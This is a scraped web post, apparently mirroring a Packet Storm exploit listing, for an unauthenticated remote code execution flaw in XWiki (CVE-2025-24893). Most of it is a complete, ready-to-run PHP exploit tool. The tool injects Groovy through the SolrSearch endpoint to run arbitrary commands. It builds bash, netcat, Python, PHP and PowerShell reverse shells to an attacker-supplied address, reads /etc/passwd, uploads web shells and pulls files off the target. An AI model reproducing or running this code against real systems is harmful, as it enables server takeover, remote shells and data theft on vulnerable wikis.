{"id":39432,"date":"2026-02-06T13:32:41","date_gmt":"2026-02-06T13:32:41","guid":{"rendered":"http:\/\/localhost\/?p=39432"},"modified":"2026-02-06T13:32:41","modified_gmt":"2026-02-06T13:32:41","slug":"xwiki-1640-remote-code-execution","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=39432","title":{"rendered":"\ud83d\udcc4 XWiki 16.4.0 Remote Code Execution_PACKETSTORM:215049"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-02-06T18:17:54&#8243;,&#8221;description&#8221;:&#8221;Proof of concept exploit for a critical template injection vulnerability in XWiki Platform that allows unauthenticated remote code execution. The vulnerability affects XWiki versions 5.3-milestone-2 to 15.10.10 and 16.0.0-rc-1 to 16.4.0, potentially&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-02-06T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-02-06T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 XWiki 16.4.0 Remote Code Execution&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:215049&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-24893&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n    | # Title     : XWiki 5.3-milestone-2 Remote Code Execution Exploit                                                                         |\\n    | # Author    : indoushka                                                                                                                   |\\n    | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.2 (64 bits)                                                            |\\n    | # Vendor    : https:\/\/github.com\/xwiki\/                                                                                                   |\\n    =============================================================================================================================================\\n    \\n    [+] References : https:\/\/packetstorm.news\/files\/id\/209041\/ \\u0026 \\tCVE-2025-24893\\n    \\n    [+] Summary    : a critical template injection vulnerability in XWiki Platform that allows unauthenticated remote code execution. \\n                     The vulnerability affects XWiki versions 5.3-milestone-2 to 15.10.10 and 16.0.0-rc-1 to 16.4.0, potentially impacting thousands of enterprise wiki installations.\\n    \\n    [+] POC :\\n    \\n    # Check for vulnerability\\n    php exploit.php http:\/\/target.com &#8211;check\\n    \\n    # Execute command\\n    php exploit.php http:\/\/target.com &#8211;cmd \\&#8221;id\\&#8221;\\n    php exploit.php http:\/\/target.com &#8211;cmd \\&#8221;whoami\\&#8221; &#8211;os windows\\n    \\n    # Create reverse shell\\n    php exploit.php http:\/\/target.com &#8211;reverse 192.168.1.100:4444\\n    php exploit.php http:\/\/target.com &#8211;reverse 192.168.1.100:4444 &#8211;shell python\\n    \\n    # Gather information\\n    php exploit.php http:\/\/target.com &#8211;info\\n    \\n    # Upload file\\n    php exploit.php http:\/\/target.com &#8211;upload shell.php:\/tmp\/shell.php\\n    \\n    # Download file\\n    php exploit.php http:\/\/target.com &#8211;download \/etc\/passwd:passwd.txt\\n    \\n    \\u003c?php\\n    \/**\\n     * BY indoushka\\n     *\/\\n    \\n    class XWikiExploit {\\n        private $target;\\n        private $path;\\n        private $timeout = 10;\\n        private $userAgent = \\&#8221;Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36\\&#8221;;\\n        \\n        public function __construct($target, $path = &#8216;\/&#8217;) {\\n            $this-\\u003etarget = rtrim($target, &#8216;\/&#8217;);\\n            $this-\\u003epath = $path;\\n        }\\n        \\n        \/**\\n         * Check if target is vulnerable\\n         *\/\\n        public function check() {\\n            echo \\&#8221;[*] Checking target: {$this-\\u003etarget}\\\\n\\&#8221;;\\n            \\n            $response = $this-\\u003esendRequest(\\&#8221;\/xwiki\/bin\/view\/Main\/\\&#8221;);\\n            \\n            if (!$response) {\\n                echo \\&#8221;[-] No response from target\\\\n\\&#8221;;\\n                return false;\\n            }\\n            \\n            \/\/ Extract version from HTML\\n            preg_match(&#8216;\/\\u003cdiv[^\\u003e]*id=\\&#8221;xwikiplatformversion\\&#8221;[^\\u003e]*\\u003e(.*?)\\u003c\\\\\/div\\u003e\/si&#8217;, $response, $matches);\\n            \\n            if (empty($matches)) {\\n                echo \\&#8221;[-] Could not find version information\\\\n\\&#8221;;\\n                return false;\\n            }\\n            \\n            preg_match(&#8216;\/XWiki.*?(\\\\d+\\\\.\\\\d+\\\\.\\\\d+)\/&#8217;, $matches[1], $versionMatch);\\n            \\n            if (empty($versionMatch)) {\\n                echo \\&#8221;[-] Could not extract version number\\\\n\\&#8221;;\\n                return false;\\n            }\\n            \\n            $version = $versionMatch[1];\\n            echo \\&#8221;[+] Detected XWiki version: {$version}\\\\n\\&#8221;;\\n            \\n            \/\/ Check if version is vulnerable\\n            $vulnerable = $this-\\u003eisVersionVulnerable($version);\\n            \\n            if ($vulnerable) {\\n                echo \\&#8221;[+] Target appears to be VULNERABLE!\\\\n\\&#8221;;\\n                return true;\\n            } else {\\n                echo \\&#8221;[-] Target appears to be SAFE\\\\n\\&#8221;;\\n                return false;\\n            }\\n        }\\n        \\n        \/**\\n         * Execute command on target\\n         *\/\\n        public function executeCommand($command, $os = &#8216;unix&#8217;) {\\n            echo \\&#8221;[*] Building payload for {$os}&#8230;\\\\n\\&#8221;;\\n            \\n            if ($os === &#8216;unix&#8217; || $os === &#8216;linux&#8217;) {\\n                $cmdArray = \\&#8221;&#8216;sh&#8217;, &#8216;-c&#8217;, &#8216;{$command}&#8217;\\&#8221;;\\n            } else {\\n                \/\/ Windows\\n                $cmdArray = \\&#8221;&#8216;cmd.exe&#8217;, &#8216;\/b&#8217;, &#8216;\/q&#8217;, &#8216;\/c&#8217;, &#8216;{$command}&#8217;\\&#8221;;\\n            }\\n            \\n            $payload = \\&#8221;{{async async=false}}{{groovy}}[{$cmdArray}].execute().text{{\/groovy}}{{\/async}}\\&#8221;;\\n            \\n            echo \\&#8221;[*] Sending payload&#8230;\\\\n\\&#8221;;\\n            \\n            $url = \\&#8221;\/xwiki\/bin\/get\/Main\/SolrSearch?media=rss\\u0026text=\\&#8221; . urlencode($payload);\\n            $response = $this-\\u003esendRequest($url);\\n            \\n            if ($response) {\\n                echo \\&#8221;[+] Command executed. Response:\\\\n\\&#8221;;\\n                echo \\&#8221;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-\\\\n\\&#8221;;\\n                echo $response;\\n                echo \\&#8221;\\\\n&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-\\\\n\\&#8221;;\\n                return $response;\\n            } else {\\n                echo \\&#8221;[-] No response received\\\\n\\&#8221;;\\n                return false;\\n            }\\n        }\\n        \\n        \/**\\n         * Reverse shell for Unix\/Linux\\n         *\/\\n        public function reverseShell($ip, $port, $shellType = &#8216;bash&#8217;) {\\n            echo \\&#8221;[*] Setting up reverse shell to {$ip}:{$port}\\\\n\\&#8221;;\\n            \\n            if ($shellType === &#8216;bash&#8217;) {\\n                $command = \\&#8221;bash -i \\u003e\\u0026 \/dev\/tcp\/{$ip}\/{$port} 0\\u003e\\u00261\\&#8221;;\\n            } elseif ($shellType === &#8216;nc&#8217;) {\\n                $command = \\&#8221;nc -e \/bin\/sh {$ip} {$port}\\&#8221;;\\n            } elseif ($shellType === &#8216;python&#8217;) {\\n                $command = \\&#8221;python -c &#8216;import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\\\\&#8221;{$ip}\\\\\\&#8221;,{$port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\\\\\\&#8221;\/bin\/sh\\\\\\&#8221;,\\\\\\&#8221;-i\\\\\\&#8221;]);&#8217;\\&#8221;;\\n            } elseif ($shellType === &#8216;php&#8217;) {\\n                $command = \\&#8221;php -r &#8216;\\\\$sock=fsockopen(\\\\\\&#8221;{$ip}\\\\\\&#8221;,{$port});exec(\\\\\\&#8221;\/bin\/sh -i \\u003c\\u00263 \\u003e\\u00263 2\\u003e\\u00263\\\\\\&#8221;);&#8217;\\&#8221;;\\n            } else {\\n                $command = \\&#8221;bash -i \\u003e\\u0026 \/dev\/tcp\/{$ip}\/{$port} 0\\u003e\\u00261\\&#8221;;\\n            }\\n            \\n            \/\/ URL encode the command\\n            return $this-\\u003eexecuteCommand($command, &#8216;unix&#8217;);\\n        }\\n        \\n        \/**\\n         * Reverse shell for Windows\\n         *\/\\n        public function reverseShellWindows($ip, $port) {\\n            echo \\&#8221;[*] Setting up Windows reverse shell to {$ip}:{$port}\\\\n\\&#8221;;\\n            \\n            \/\/ PowerShell reverse shell\\n            $command = \\&#8221;powershell -NoP -NonI -W Hidden -Exec Bypass -Command \\\\\\&#8221;\\\\$TCPClient = New-Object Net.Sockets.TCPClient(&#8216;{$ip}&#8217;, {$port});\\\\$NetworkStream = \\\\$TCPClient.GetStream();\\\\$StreamWriter = New-Object IO.StreamWriter(\\\\$NetworkStream);\\\\$StreamWriter.WriteLine((Get-WmiObject Win32_ComputerSystem).Name + &#8216;:&#8217; + (Get-WmiObject Win32_OperatingSystem).Version);\\\\$StreamWriter.Flush();while((\\\\$BytesRead = \\\\$NetworkStream.Read(\\\\$Buffer, 0, \\\\$Buffer.Length)) -gt 0){\\\\$Command = ([Text.Encoding]::ASCII).GetString(\\\\$Buffer, 0, \\\\$BytesRead &#8211; 1);\\\\$Output = try { Invoke-Expression \\\\$Command 2\\u003e\\u00261 | Out-String } catch { \\\\$_ | Out-String };\\\\$ReturnOutput = \\\\$Output + &#8216;PS &#8216; + (Get-Location).Path + &#8216;\\u003e &#8216;;\\\\$StreamWriter.Write(\\\\$ReturnOutput);\\\\$StreamWriter.Flush()};\\\\$StreamWriter.Close()\\\\\\&#8221;\\&#8221;;\\n            \\n            return $this-\\u003eexecuteCommand($command, &#8216;windows&#8217;);\\n        }\\n        \\n        \/**\\n         * Information gathering\\n         *\/\\n        public function gatherInfo() {\\n            echo \\&#8221;[*] Gathering system information&#8230;\\\\n\\&#8221;;\\n            \\n            $commands = [\\n                &#8216;id&#8217; =\\u003e &#8216;id&#8217;,\\n                &#8216;whoami&#8217; =\\u003e &#8216;whoami&#8217;,\\n                &#8216;uname&#8217; =\\u003e &#8216;uname -a&#8217;,\\n                &#8216;pwd&#8217; =\\u003e &#8216;pwd&#8217;,\\n                &#8216;ps&#8217; =\\u003e &#8216;ps aux | head -20&#8217;,\\n                &#8216;users&#8217; =\\u003e &#8216;cat \/etc\/passwd | head -20&#8217;,\\n                &#8216;network&#8217; =\\u003e &#8216;ifconfig || ip addr&#8217;\\n            ];\\n            \\n            foreach ($commands as $name =\\u003e $cmd) {\\n                echo \\&#8221;\\\\n[*] Executing: {$name}\\\\n\\&#8221;;\\n                $this-\\u003eexecuteCommand($cmd, &#8216;unix&#8217;);\\n                sleep(1); \/\/ Avoid rate limiting\\n            }\\n        }\\n        \\n        \/**\\n         * File upload\\n         *\/\\n        public function uploadFile($localFile, $remotePath) {\\n            if (!file_exists($localFile)) {\\n                echo \\&#8221;[-] Local file not found: {$localFile}\\\\n\\&#8221;;\\n                return false;\\n            }\\n            \\n            $content = base64_encode(file_get_contents($localFile));\\n            $command = \\&#8221;echo &#8216;{$content}&#8217; | base64 -d \\u003e {$remotePath}\\&#8221;;\\n            \\n            echo \\&#8221;[*] Uploading {$localFile} to {$remotePath}\\\\n\\&#8221;;\\n            return $this-\\u003eexecuteCommand($command, &#8216;unix&#8217;);\\n        }\\n        \\n        \/**\\n         * File download\\n         *\/\\n        public function downloadFile($remoteFile, $localFile) {\\n            $command = \\&#8221;cat {$remoteFile} | base64\\&#8221;;\\n            $response = $this-\\u003eexecuteCommand($command, &#8216;unix&#8217;);\\n            \\n            if ($response \\u0026\\u0026 preg_match(&#8216;\/^[A-Za-z0-9+\\\\\/=]+$\/m&#8217;, trim($response))) {\\n                $decoded = base64_decode(trim($response));\\n                file_put_contents($localFile, $decoded);\\n                echo \\&#8221;[+] File downloaded to: {$localFile}\\\\n\\&#8221;;\\n                return true;\\n            } else {\\n                echo \\&#8221;[-] Failed to download file\\\\n\\&#8221;;\\n                return false;\\n            }\\n        }\\n        \\n        \/**\\n         * Private helper methods\\n         *\/\\n        private function sendRequest($uri) {\\n            $url = $this-\\u003etarget . $uri;\\n            \\n            $ch = curl_init();\\n            curl_setopt($ch, CURLOPT_URL, $url);\\n            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\\n            curl_setopt($ch, CURLOPT_TIMEOUT, $this-\\u003etimeout);\\n            curl_setopt($ch, CURLOPT_USERAGENT, $this-\\u003euserAgent);\\n            curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);\\n            curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);\\n            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);\\n            \\n            $response = curl_exec($ch);\\n            $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);\\n            \\n            if (curl_errno($ch)) {\\n                echo \\&#8221;[-] cURL Error: \\&#8221; . curl_error($ch) . \\&#8221;\\\\n\\&#8221;;\\n                curl_close($ch);\\n                return false;\\n            }\\n            \\n            curl_close($ch);\\n            \\n            if ($httpCode == 200) {\\n                return $response;\\n            } else {\\n                echo \\&#8221;[-] HTTP Error: {$httpCode}\\\\n\\&#8221;;\\n                return false;\\n            }\\n        }\\n        \\n        private function isVersionVulnerable($version) {\\n            $versionParts = explode(&#8216;.&#8217;, $version);\\n            \\n            if (count($versionParts) \\u003c 3) {\\n                return false;\\n            }\\n            \\n            $major = (int)$versionParts[0];\\n            $minor = (int)$versionParts[1];\\n            $patch = (int)$versionParts[2];\\n            \\n            \/\/ Check vulnerable ranges\\n            if ($major \\u003e= 5 \\u0026\\u0026 $major \\u003c= 15) {\\n                if ($major == 5 \\u0026\\u0026 $minor \\u003e= 3) {\\n                    return true;\\n                } elseif ($major == 15 \\u0026\\u0026 $minor == 10 \\u0026\\u0026 $patch \\u003c= 10) {\\n                    return true;\\n                } elseif ($major \\u003e 5 \\u0026\\u0026 $major \\u003c 15) {\\n                    return true;\\n                }\\n            } elseif ($major == 16) {\\n                if ($minor == 0 \\u0026\\u0026 $patch == 0) {\\n                    \/\/ 16.0.0-rc-1 is vulnerable\\n                    return true;\\n                } elseif ($minor == 4 \\u0026\\u0026 $patch == 0) {\\n                    return true;\\n                } elseif ($minor \\u003c 4) {\\n                    return true;\\n                }\\n            }\\n            \\n            return false;\\n        }\\n    }\\n    \\n    \/**\\n     * Usage examples\\n     *\/\\n    function printHelp() {\\n        echo \\&#8221;Powered by indoushka XWiki CVE-2025-24893 Exploit Tool\\\\n\\&#8221;;\\n        echo \\&#8221;Usage:\\\\n\\&#8221;;\\n        echo \\&#8221;  php exploit.php \\u003ctarget\\u003e [options]\\\\n\\\\n\\&#8221;;\\n        echo \\&#8221;Options:\\\\n\\&#8221;;\\n        echo \\&#8221;  &#8211;check                Check if target is vulnerable\\\\n\\&#8221;;\\n        echo \\&#8221;  &#8211;cmd \\u003ccommand\\u003e        Execute system command\\\\n\\&#8221;;\\n        echo \\&#8221;  &#8211;os \\u003cunix|windows\\u003e    Target OS (default: unix)\\\\n\\&#8221;;\\n        echo \\&#8221;  &#8211;reverse \\u003cip:port\\u003e    Create reverse shell\\\\n\\&#8221;;\\n        echo \\&#8221;  &#8211;shell \\u003ctype\\u003e         Shell type (bash, nc, python, php)\\\\n\\&#8221;;\\n        echo \\&#8221;  &#8211;info                 Gather system information\\\\n\\&#8221;;\\n        echo \\&#8221;  &#8211;upload \\u003clocal:remote\\u003e Upload file\\\\n\\&#8221;;\\n        echo \\&#8221;  &#8211;download \\u003cremote:local\\u003e Download file\\\\n\\&#8221;;\\n        echo \\&#8221;  &#8211;path \\u003cpath\\u003e          XWiki installation path (default: \/)\\\\n\\&#8221;;\\n        echo \\&#8221;  &#8211;help                 Show this help\\\\n\\\\n\\&#8221;;\\n        echo \\&#8221;Examples:\\\\n\\&#8221;;\\n        echo \\&#8221;  php exploit.php http:\/\/target.com &#8211;check\\\\n\\&#8221;;\\n        echo \\&#8221;  php exploit.php http:\/\/target.com &#8211;cmd &#8216;id&#8217;\\\\n\\&#8221;;\\n        echo \\&#8221;  php exploit.php http:\/\/target.com &#8211;reverse 192.168.1.100:4444\\\\n\\&#8221;;\\n        echo \\&#8221;  php exploit.php http:\/\/target.com &#8211;upload shell.php:\/tmp\/shell.php\\\\n\\&#8221;;\\n    }\\n    \\n    \/**\\n     * Main execution\\n     *\/\\n    if (PHP_SAPI !== &#8216;cli&#8217;) {\\n        die(\\&#8221;This script must be run from command line\\\\n\\&#8221;);\\n    }\\n    \\n    if ($argc \\u003c 2) {\\n        printHelp();\\n        exit(1);\\n    }\\n    \\n    $target = $argv[1];\\n    $options = [\\n        &#8216;path&#8217; =\\u003e &#8216;\/&#8217;,\\n        &#8216;os&#8217; =\\u003e &#8216;unix&#8217;\\n    ];\\n    \\n    \/\/ Parse command line arguments\\n    for ($i = 2; $i \\u003c $argc; $i++) {\\n        switch ($argv[$i]) {\\n            case &#8216;&#8211;check&#8217;:\\n                $options[&#8216;check&#8217;] = true;\\n                break;\\n            case &#8216;&#8211;cmd&#8217;:\\n                $options[&#8216;cmd&#8217;] = $argv[++$i];\\n                break;\\n            case &#8216;&#8211;os&#8217;:\\n                $options[&#8216;os&#8217;] = $argv[++$i];\\n                break;\\n            case &#8216;&#8211;reverse&#8217;:\\n                $options[&#8216;reverse&#8217;] = $argv[++$i];\\n                break;\\n            case &#8216;&#8211;shell&#8217;:\\n                $options[&#8216;shell&#8217;] = $argv[++$i];\\n                break;\\n            case &#8216;&#8211;info&#8217;:\\n                $options[&#8216;info&#8217;] = true;\\n                break;\\n            case &#8216;&#8211;upload&#8217;:\\n                $options[&#8216;upload&#8217;] = $argv[++$i];\\n                break;\\n            case &#8216;&#8211;download&#8217;:\\n                $options[&#8216;download&#8217;] = $argv[++$i];\\n                break;\\n            case &#8216;&#8211;path&#8217;:\\n                $options[&#8216;path&#8217;] = $argv[++$i];\\n                break;\\n            case &#8216;&#8211;help&#8217;:\\n                printHelp();\\n                exit(0);\\n            default:\\n                echo \\&#8221;Unknown option: {$argv[$i]}\\\\n\\&#8221;;\\n                printHelp();\\n                exit(1);\\n        }\\n    }\\n    \\n    \/\/ Create exploit instance\\n    $exploit = new XWikiExploit($target, $options[&#8216;path&#8217;]);\\n    \\n    \/\/ Execute requested action\\n    if (isset($options[&#8216;check&#8217;])) {\\n        $exploit-\\u003echeck();\\n    } elseif (isset($options[&#8216;cmd&#8217;])) {\\n        $exploit-\\u003eexecuteCommand($options[&#8216;cmd&#8217;], $options[&#8216;os&#8217;]);\\n    } elseif (isset($options[&#8216;reverse&#8217;])) {\\n        list($ip, $port) = explode(&#8216;:&#8217;, $options[&#8216;reverse&#8217;]);\\n        if ($options[&#8216;os&#8217;] === &#8216;windows&#8217;) {\\n            $exploit-\\u003ereverseShellWindows($ip, $port);\\n        } else {\\n            $shellType = $options[&#8216;shell&#8217;] ?? &#8216;bash&#8217;;\\n            $exploit-\\u003ereverseShell($ip, $port, $shellType);\\n        }\\n    } elseif (isset($options[&#8216;info&#8217;])) {\\n        $exploit-\\u003egatherInfo();\\n    } elseif (isset($options[&#8216;upload&#8217;])) {\\n        list($local, $remote) = explode(&#8216;:&#8217;, $options[&#8216;upload&#8217;], 2);\\n        $exploit-\\u003euploadFile($local, $remote);\\n    } elseif (isset($options[&#8216;download&#8217;])) {\\n        list($remote, $local) = explode(&#8216;:&#8217;, $options[&#8216;download&#8217;], 2);\\n        $exploit-\\u003edownloadFile($remote, $local);\\n    } else {\\n        echo \\&#8221;No action specified. Use &#8211;help for usage information.\\\\n\\&#8221;;\\n    }\\n    \\n    echo \\&#8221;\\\\n[*] Exploit completed\\\\n\\&#8221;;\\n    ?\\u003e\\n    \\n    \\n    Greetings to :=====================================================================================\\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n    ===================================================================================================&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/215049&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:9.8,&#8221;severity&#8221;:&#8221;CRITICAL&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/215049\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-02-06T18:17:54&#8243;,&#8221;description&#8221;:&#8221;Proof of concept exploit for a critical template injection vulnerability in XWiki Platform that allows unauthenticated remote code execution. The vulnerability affects XWiki versions 5.3-milestone-2&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,13,53,7,11,5],"class_list":["post-39432","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 XWiki 16.4.0 Remote Code Execution_PACKETSTORM:215049 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=39432\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 XWiki 16.4.0 Remote Code Execution_PACKETSTORM:215049 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-02-06T18:17:54&#8243;,&#8221;description&#8221;:&#8221;Proof of concept exploit for a critical template injection vulnerability in XWiki Platform that allows unauthenticated remote code execution. The vulnerability affects XWiki versions 5.3-milestone-2...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=39432\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-06T13:32:41+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"10 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39432#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39432\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 XWiki 16.4.0 Remote Code Execution_PACKETSTORM:215049\",\"datePublished\":\"2026-02-06T13:32:41+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39432\"},\"wordCount\":1998,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.8\",\"exploit\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=39432#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39432\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39432\",\"name\":\"\ud83d\udcc4 XWiki 16.4.0 Remote Code Execution_PACKETSTORM:215049 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-02-06T13:32:41+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39432#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=39432\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39432#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 XWiki 16.4.0 Remote Code Execution_PACKETSTORM:215049\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 XWiki 16.4.0 Remote Code Execution_PACKETSTORM:215049 - zero 